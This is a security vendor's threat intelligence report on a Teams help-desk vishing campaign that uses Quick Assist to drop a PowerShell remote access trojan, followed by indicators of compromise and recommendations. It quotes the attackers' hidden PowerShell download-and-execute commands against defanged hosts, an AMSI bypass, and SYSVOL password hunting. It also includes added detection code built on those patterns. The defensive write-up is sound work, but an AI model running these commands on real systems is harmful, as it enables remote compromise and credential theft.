Security Intelligence
January 30, 2026 | Security intelligence
Quick, You Need Assistance!
With contributions from Alexander Yakub, Chris Augi, Chris Price, Dan Coburn, Earl Fischl, Jonathan Machnee.
In September 2025, Field Effect began tracking a Microsoft Teams voice-phishing (vishing) campaign leveraging Quick Assist, a remote administration tool that comes pre-installed by default on many modern versions of Windows including Windows 11.
Quick Assist lets a remote party view and control the local user's computer. It has its own keyboard shortcut, Ctrl-Win-Q, which either starts the application or prompts the user to install it from the Microsoft Store.
In this campaign, threat actors were observed using Quick Assist to deliver a PowerShell web-socket remote access trojan (RAT).
Initial access
Initial access is achieved through a help desk scam aimed at a small number of users within targeted organizations. The user receives an inbound Microsoft Teams voice call from a third-party caller, typically using the display name “Help Desk,” intended to impersonate the organization’s IT team.
During the call, the user is told there is an issue with their computer and is instructed to connect via Quick Assist, which the attacker then uses to gain a foothold on the system. The scale observed by Field Effect indicates that this phase of the activity is automated.
The third-party caller comes from rapidly rotating M365 tenants, using the ‘onmicrosoft.com’ default domains, with subdomains referring to IT and cybersecurity terms such as:
- certifieditsec[.]onmicrosoft[.]com
- systemharden[.]onmicrosoft[.]com
The speed of new tenants appearing demonstrates that the actor has the capability to rapidly bypass Microsoft security protocols to create new M365 accounts. The usernames for the accounts used also rapidly rotate, with Field Effect observing common patterns of re-use across the tenants. Some examples are:
- help
- it
- itadmin
- itadministrator
- ithelp
- helpdesk
- ithelpdesk
- systemsadmin
Notably, Microsoft Teams already warns users when inbound chat messages originate from a suspicious third-party tenant; the equivalent warning for suspicious incoming voice calls is due to be rolled out in February 2026.
Field Effect has reported all the M365 tenants observed in this campaign to Microsoft for further investigation.
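As an added illustration of the caller-identity pattern described above (example code written for this write-up, not Field Effect's detection logic and not the ARO mentioned later), the following Python scores an inbound external Teams identity on the traits the campaign re-uses: a default onmicrosoft.com tenant, an IT/security-themed tenant name, a helpdesk-style username re-used across tenants, and a "Help Desk" display name. The sample records, their field names, the weights and the threshold are constructed assumptions.

```python
import re

# Constructed sample of inbound Teams identities from external tenants. The
# record shape (caller, display_name, kind) is an assumption for this example.
SAMPLE_EVENTS = [
    {"caller": "helpdesk@certifieditsec.onmicrosoft.com", "display_name": "Help Desk", "kind": "call"},
    {"caller": "itadmin@systemharden.onmicrosoft.com", "display_name": "Help Desk", "kind": "call"},
    {"caller": "alice@partnercorp.example", "display_name": "Alice Example", "kind": "chat"},
    {"caller": "sales@contoso.onmicrosoft.com", "display_name": "Sales", "kind": "chat"},
]

# Fragments seen in the campaign's IT/security-themed tenant names.
IT_TERMS = ("sec", "security", "harden", "vpn", "firewall", "support", "incident",
            "infrastructure", "monitoring", "certified", "audit", "mandatory", "enterprise")
# Usernames the campaign re-used across tenants.
SUSPICIOUS_USERS = {"help", "it", "itadmin", "itadministrator", "ithelp",
                    "helpdesk", "ithelpdesk", "systemsadmin"}
DEFAULT_TENANT = re.compile(r"^([a-z0-9]+)\.onmicrosoft\.com$", re.I)


def score_caller(caller, display_name):
    """Return (score, reasons) for one external caller identity (weights are illustrative)."""
    local, _, domain = caller.lower().rpartition("@")
    score, reasons = 0, []
    m = DEFAULT_TENANT.match(domain)
    if m:
        score += 1
        reasons.append("default onmicrosoft.com tenant")
        if any(term in m.group(1) for term in IT_TERMS):
            score += 2
            reasons.append("IT/security-themed tenant name")
    if local in SUSPICIOUS_USERS:
        score += 2
        reasons.append("re-used helpdesk-style username")
    if "helpdesk" in display_name.lower().replace(" ", ""):
        score += 1
        reasons.append("display name impersonates internal help desk")
    return score, reasons


def triage(events, threshold=4):
    """Return the callers whose score reaches the threshold, highest first."""
    flagged = []
    for ev in events:
        score, reasons = score_caller(ev["caller"], ev["display_name"])
        if score >= threshold:
            flagged.append({"caller": ev["caller"], "kind": ev["kind"],
                            "score": score, "reasons": reasons})
    return sorted(flagged, key=lambda f: f["score"], reverse=True)


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["score"], f["kind"], f["caller"], "; ".join(f["reasons"]))
```

A default onmicrosoft.com tenant on its own is weak evidence (many legitimate small tenants never add a custom domain), which is why it only scores one point; the combination with an IT-themed tenant name and a helpdesk-style username is what separates the campaign's callers from ordinary external contacts.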
During the vishing attack, the user is prompted to run a Quick Assist remote session. Once the threat actor has access to the host, the attacker will first conduct user group enumeration with the commands:
- net group /dom
- whoami /groups
Following this, a PowerShell script is launched, via cmd.exe, which downloads and executes the next stage of the attack, command and control (C2).
Since early November 2025, the following two commands have been observed:
`cmd.exe /c "echo $wo=New-Object System.Net.WebClient;[Net.ServicePointManager]::SecurityProtocol='Tls12';$wo.DownloadString('hxxps://prosearium[.]net/setting.pdf') | powershell.exe -NoProfile - | powershell.exe -NonInteractive -NoProfile -WindowStyle hidden -"`
and
`"C:\WINDOWS\system32\cmd.exe" /c start "" /min powershell.exe -WindowStyle Hidden -Command "$wo=New-Object System.Net.WebClient;[Net.ServicePointManager]::SecurityProtocol='Tls12';$wo.DownloadString('hxxps://aerobionix[.]com/generation.pdf')|powershell.exe -NoProfile -WindowStyle Hidden -" & start "" "C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"`
(Note: Domain names change over time).
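To show what the two command lines above look like from a detection standpoint, here is an added Python example (not the campaign's code and not Field Effect's detection content) that applies a handful of rules to constructed process-creation records: a download cradle, a trailing lone `-` that makes powershell.exe read its script from standard input, a hidden window, cmd.exe echoing script text into a PowerShell pipe, and the two group-enumeration commands. The sample records, their field names and the placeholder URL are constructed; the Office decoy launch at the end of the second command is reproduced only to show that it does not disturb the match.

```python
import re

# Constructed process-creation records in a Sysmon-style shape (field names are
# assumptions). URLs point at a placeholder host, not the campaign's domains.
STAGER_CMD = (
    'cmd.exe /c "echo $wo=New-Object System.Net.WebClient;'
    "[Net.ServicePointManager]::SecurityProtocol='Tls12';"
    "$wo.DownloadString('https://stager.example.invalid/setting.pdf')"
    ' | powershell.exe -NoProfile - | powershell.exe -NonInteractive -NoProfile -WindowStyle hidden -"'
)
DECOY_CMD = (
    r'"C:\WINDOWS\system32\cmd.exe" /c start "" /min powershell.exe -WindowStyle Hidden -Command '
    '"$wo=New-Object System.Net.WebClient;$wo.DownloadString(\'https://stager.example.invalid/generation.pdf\')'
    '|powershell.exe -NoProfile -WindowStyle Hidden -" & start "" "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE"'
)
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\cmd.exe", "cmdline": STAGER_CMD},
    {"parent": r"C:\Windows\System32\cmd.exe", "cmdline": DECOY_CMD},
    {"parent": r"C:\Windows\System32\cmd.exe", "cmdline": "net group /dom"},
    {"parent": r"C:\Windows\System32\cmd.exe", "cmdline": "whoami /groups"},
    # Benign: an admin script run by path, no cradle, no stdin script.
    {"parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
]

DOWNLOAD_CRADLE = re.compile(
    r"downloadstring\(|downloadfile\(|invoke-webrequest|\biwr\b|\biex\b|invoke-expression", re.I)
# A lone "-" as the last argument makes powershell.exe read the script from stdin.
STDIN_SCRIPT = re.compile(r'powershell(?:\.exe)?[^|"]*\s-(?=\s*(?:\||"|$))', re.I)
HIDDEN_WINDOW = re.compile(r"-windowstyle\s+hidden|\bstart\b[^&|]*/min\b", re.I)
ECHO_PIPE = re.compile(r"\becho\b.*\|\s*powershell", re.I)
URL = re.compile(r"https?://[^\s'\")]+", re.I)
RECON_COMMANDS = {"net group /dom", "net group /domain", "whoami /groups"}


def analyse(cmdline):
    """Return the set of rule names one command line triggers, plus any URL it carries."""
    hits = set()
    if DOWNLOAD_CRADLE.search(cmdline):
        hits.add("download_cradle")
    if STDIN_SCRIPT.search(cmdline):
        hits.add("script_via_stdin")
    if HIDDEN_WINDOW.search(cmdline):
        hits.add("hidden_window")
    if ECHO_PIPE.search(cmdline):
        hits.add("cmd_echo_to_powershell")
    if " ".join(cmdline.lower().split()) in RECON_COMMANDS:
        hits.add("group_enumeration")
    m = URL.search(cmdline)
    return hits, (m.group(0) if m else None)


def scan(events, min_rules=2):
    """Flag events that trigger at least min_rules stager rules, or any recon command."""
    findings = []
    for idx, ev in enumerate(events):
        hits, url = analyse(ev["cmdline"])
        if len(hits) >= min_rules or "group_enumeration" in hits:
            findings.append({"index": idx, "rules": sorted(hits), "url": url})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f["index"], ", ".join(f["rules"]), f["url"] or "")
```

Requiring two rules for the stager keeps a lone `-WindowStyle hidden` (common in scheduled admin scripts) from alerting on its own, while the stdin-script pattern plus a download cradle is rare in legitimate automation. The group-enumeration commands alert on their own because the campaign runs them immediately after the Quick Assist session starts, so they are an early, cheap signal.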
This infographic demonstrates the full initial access process:

Command and control
The previous command downloads and executes a heavily obfuscated PowerShell payload from domains hosted on M247. Notably, most of the domains used in this stage do not appear to be newly registered.

Once deciphered, the PowerShell script contains the following three components:
- The first is Antimalware Scan Interface (AMSI) bypass functionality which patches the “AmsiScanBuffer” string in the Common Language Runtime library (“clr.dll”) loaded in memory.
- The second component is a function that combines a keyed XOR cipher with base64 encoding to encrypt and decrypt strings.
- The final piece of code sends the C2 server metadata about the host and retrieves the second stage payload. This functionality uses a hard-coded UserAgent when retrieving the second payload. It is possible that the C2 server inspects the UserAgent to filter out requests that do not originate from real victims, such as researchers.
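The second component, a keyed XOR combined with base64, is a common string-obfuscation layer rather than real encryption. The following added Python example (written for this write-up, not code taken from the sample) implements the same construction so an analyst can decode such strings when the key is known and, when it is not, recover the key stream from a known plaintext and read off its period. The key, plaintext and token values are constructed.

```python
import base64


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call both encrypts and decrypts."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_string(plaintext: str, key: str) -> str:
    """XOR the UTF-8 plaintext with the key, then base64 the result."""
    return base64.b64encode(xor_bytes(plaintext.encode("utf-8"), key.encode("utf-8"))).decode("ascii")


def decode_string(token: str, key: str) -> str:
    """Reverse of encode_string: base64-decode, then XOR with the same key."""
    return xor_bytes(base64.b64decode(token), key.encode("utf-8")).decode("utf-8")


def recover_keystream(token: str, known_plaintext: str) -> bytes:
    """Known-plaintext step: ciphertext XOR plaintext gives the key stream."""
    ct = base64.b64decode(token)
    pt = known_plaintext.encode("utf-8")
    return xor_bytes(ct[: len(pt)], pt)


def shortest_period(stream: bytes) -> int:
    """Smallest p such that the stream repeats every p bytes."""
    for p in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % p] for i in range(len(stream))):
            return p
    return len(stream)


def recover_key(token: str, known_plaintext: str) -> bytes:
    """Recover the repeating key from a token whose plaintext is known.

    The known plaintext must be at least as long as the key, otherwise the
    recovered period is only a prefix of the real key.
    """
    stream = recover_keystream(token, known_plaintext)
    return stream[: shortest_period(stream)]


if __name__ == "__main__":
    key = "k3y"                       # constructed key
    token = encode_string("whoami /groups", key)
    print(token, "->", decode_string(token, key))
    print("recovered key:", recover_key(token, "whoami /groups"))
```

In practice the known plaintext comes from something the script must contain in the clear once decoded, such as the start of the hard-coded User-Agent string or a well-known cmdlet name; once the period is known, the same key decodes every other string in the sample.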

At this stage, an encoded PowerShell web-socket remote access trojan is downloaded and executed. This connects to the same C2 server as the previous step and grants the threat actor remote access to the infected host.

This web-socket RAT has the same system reconnaissance function and user agent check as the RAT documented in SentinelOne’s PhantomCaptcha blog. At this point, the attacker has the capability to run any commands they wish on the victim's computer.
Infrastructure and IoCs
The threat actor has been observed using the following tenants, IPs, and domains to host C2 infrastructure:
Tenants:
- certifieditengineering.onmicrosoft[.]com
- certifieditsec.onmicrosoft[.]com
- certifieditsecurity.onmicrosoft[.]com
- certifiednetupdate.onmicrosoft[.]com
- certifiedvpnsecurity.onmicrosoft[.]com
- enterprisegradesecurities.onmicrosoft[.]com
- enterpriseitmonitoringewf12.onmicrosoft[.]com
- enterprisesecsolutions.onmicrosoft[.]com
- enterprisesecurityanalysis.onmicrosoft[.]com
- incidentresponseit.onmicrosoft[.]com
- infrastructurefirewall.onmicrosoft[.]com
- infrastructureinternal.onmicrosoft[.]com
- internalnetsolution.onmicrosoft[.]com
- internalvpnsolution.onmicrosoft[.]com
- itsecuritycertified.onmicrosoft[.]com
- mandatorynetsecurity.onmicrosoft[.]com
- mandatorynetworkmonitoring.onmicrosoft[.]com
- mandatoryvirtualprivatenet.onmicrosoft[.]com
- mandatoryvpnsec.onmicrosoft[.]com
- officesups365.onmicrosoft[.]com
- onsupport365.onmicrosoft[.]com
- privatenetaudit.onmicrosoft[.]com
- privatenethardening.onmicrosoft[.]com
- securityanalysisenterprise.onmicrosoft[.]com
- systemharden.onmicrosoft[.]com
- systemhardeningwefewweggwer.onmicrosoft[.]com
IPs:
- 162.252.172[.]102
- 162.252.172[.]83
- 165.172.252[.]162
- 162.252.172[.]21
- 164.173.252[.]162
- 162.252.174[.]119
- 149.154.158[.]86
- 162.252.173[.]45
- 162.252.172[.]16
- 162.252.172[.]245
- 162.252.172[.]74
Domains:
- Elaantravel[.]com
- Saidozdemir[.]com
- Halungroup[.]com
- j4jobspk[.]com
- ibizers[.]com
- aerobionix[.]com
- prosearium[.]net
- flyskyenterprise[.]com
- mdbelaluddin[.]com
- khanvas[.]com
- maxolutions243[.]com
Observed incidents
In a compromise in late September 2025, we first observed the PowerShell command format reaching out to the ‘aerobionix[.]com’ domain.
In this case, the threat actor installed AnyDesk before performing user group discovery. They then ran the PowerShell stager to execute the web-socket RAT before downloading the NetSupport Manager and setting a run key to execute it as another form of persistent access.
The NetSupport Manager process and run key were detected and removed by Defender shortly after the run key was set.
The threat actor then checked what antivirus was installed using the Windows Management Instrumentation Command-line (WMIC). After, they attempted to search the SYSVOL share for `sPwd` and `cpassword` strings to try to find credentials potentially stored in Group Policy Preferences.
These attempts were blocked by Field Effect MDR, and the hosts were isolated.
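The incident above is a sequence rather than a single event: an RMM tool runs, groups are enumerated, a run key is set pointing at the NetSupport client, WMIC is queried for antivirus products, and SYSVOL is searched for Group Policy Preference password strings. The added Python example below (written for this write-up, not Field Effect's detection logic) tags such events and correlates them per host on a constructed timeline so that the chain raises one scored alert instead of five unrelated hits. Host names, paths, the event field names, the NetSupport client binary name used here and the weights are assumptions for the example.

```python
import re
from collections import defaultdict

# Constructed host timeline. Event shapes are assumptions for this example:
# process events carry "image" and "cmdline", registry events "key" and "data".
SAMPLE_TIMELINE = [
    {"host": "WS-042", "type": "process", "image": r"C:\Users\user\Downloads\AnyDesk.exe", "cmdline": "AnyDesk.exe"},
    {"host": "WS-042", "type": "process", "image": r"C:\Windows\System32\net.exe", "cmdline": "net group /dom"},
    {"host": "WS-042", "type": "process", "image": r"C:\Windows\System32\whoami.exe", "cmdline": "whoami /groups"},
    {"host": "WS-042", "type": "registry",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\client32",
     "data": r"C:\ProgramData\NSM\client32.exe"},
    {"host": "WS-042", "type": "process", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r"wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName"},
    {"host": "WS-042", "type": "process", "image": r"C:\Windows\System32\findstr.exe",
     "cmdline": r"findstr /S /I cpassword \\corp.example.invalid\sysvol\*.xml"},
    # Benign run key on another host: a sync client registering itself.
    {"host": "WS-007", "type": "registry",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "data": r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
]

# AnyDesk and the NetSupport Manager client (assumed name client32.exe).
RMM_BINARIES = {"anydesk.exe", "client32.exe"}
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\", re.I)
EXE_NAME = re.compile(r'([^\\"]+\.exe)', re.I)
RECON = {"net group /dom", "net group /domain", "whoami /groups"}
# Illustrative weights; a host alerts when the sum over its distinct tags reaches the threshold.
WEIGHTS = {"rmm_tool": 2, "rmm_run_key": 3, "run_key": 1, "group_enumeration": 1,
           "av_discovery": 2, "gpp_credential_hunt": 3}


def tag_event(ev):
    """Map one event to the set of behaviour tags it exhibits."""
    tags = set()
    if ev["type"] == "process":
        cmd = " ".join(ev["cmdline"].lower().split())
        image = ev["image"].lower().rsplit("\\", 1)[-1]
        if image in RMM_BINARIES:
            tags.add("rmm_tool")
        if cmd in RECON:
            tags.add("group_enumeration")
        if "wmic" in cmd and ("antivirusproduct" in cmd or "securitycenter2" in cmd):
            tags.add("av_discovery")
        if "sysvol" in cmd and ("cpassword" in cmd or "spwd" in cmd):
            tags.add("gpp_credential_hunt")
    elif ev["type"] == "registry" and RUN_KEY.search(ev["key"]):
        m = EXE_NAME.search(ev["data"])
        target = m.group(1).lower() if m else ""
        tags.add("rmm_run_key" if target in RMM_BINARIES else "run_key")
    return tags


def correlate(timeline, threshold=6):
    """Aggregate tags per host and score them; returns {host: {tags, score, alert}}."""
    per_host = defaultdict(set)
    for ev in timeline:
        per_host[ev["host"]] |= tag_event(ev)
    result = {}
    for host, tags in per_host.items():
        score = sum(WEIGHTS[t] for t in tags)
        result[host] = {"tags": sorted(tags), "score": score, "alert": score >= threshold}
    return result


if __name__ == "__main__":
    for host, r in correlate(SAMPLE_TIMELINE).items():
        print(host, "ALERT" if r["alert"] else "ok", r["score"], ", ".join(r["tags"]))
```

A run key by itself scores one point, because plenty of legitimate software registers one, whereas a run key whose target is an RMM client scores three; the AV query and the SYSVOL credential hunt are weighted highly because ordinary users have no reason to run either.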
In another case, the attempt to run the PowerShell loader was blocked, and the threat actor instead updated the local VPN client configuration of the compromised host to point at a new destination. This may have been an attempt to steal the user’s VPN client information, or an attempt to add a backdoor into the network.
Attribution
Many of the techniques observed in this campaign overlap with previously reported activity.
- The vishing initial access component overlaps with Storm-1811 reporting by Microsoft. This group is likely operating as an Initial Access Broker (IAB) based on the differing outcomes observed. An IAB would sell successfully gained access, often via a dark web marketplace.
- The second stage RAT observed has many similarities to the SentinelOne report on PhantomCaptcha, as mentioned earlier. However, that report ties the activity to an attack on Ukraine from Russian-sourced infrastructure. This is different from the activity observed here.
We assess it's likely that we're observing a complex cybercrime ecosystem in which victims and tooling (malware) are shared or sold to different attackers, who then execute for varying outcomes.
It's also likely that the activity we're observing is intended to lead to ransomware deployment; however, all Field Effect observations of the activity have been successfully blocked.
MITRE ATT&CK
| Tactics | Techniques | Observations |
| --- | --- | --- |
| Resource development | | |
| Initial access | | |
| Execution | | |
| Persistence | | |
| Defense evasion | | |
| Credential access | | |
| Discovery | | |
| Command & control | | |
Field Effect AROs
- Field Effect EDR blocked execution, generated AROs, and contained the incidents in observed cases.
- We have created a new cloud ARO for suspicious remote Teams messages in response to this threat. This ARO notifies clients as soon as one of these suspicious external Teams messages is observed.
Recommendations
- Review Microsoft Teams Security Best Practices and restrict inbound messaging from unknown tenants.
- Raise awareness. Add Teams chat-based social engineering attacks, including voice-phishing (vishing), to your cybersecurity awareness programs.
- Uninstall Quick Assist, or use application whitelisting to restrict access to it, where it is not necessary.
- Monitor for the anomalous installation of remote monitoring and management (RMM) tools through EDR tooling, such as Field Effect MDR.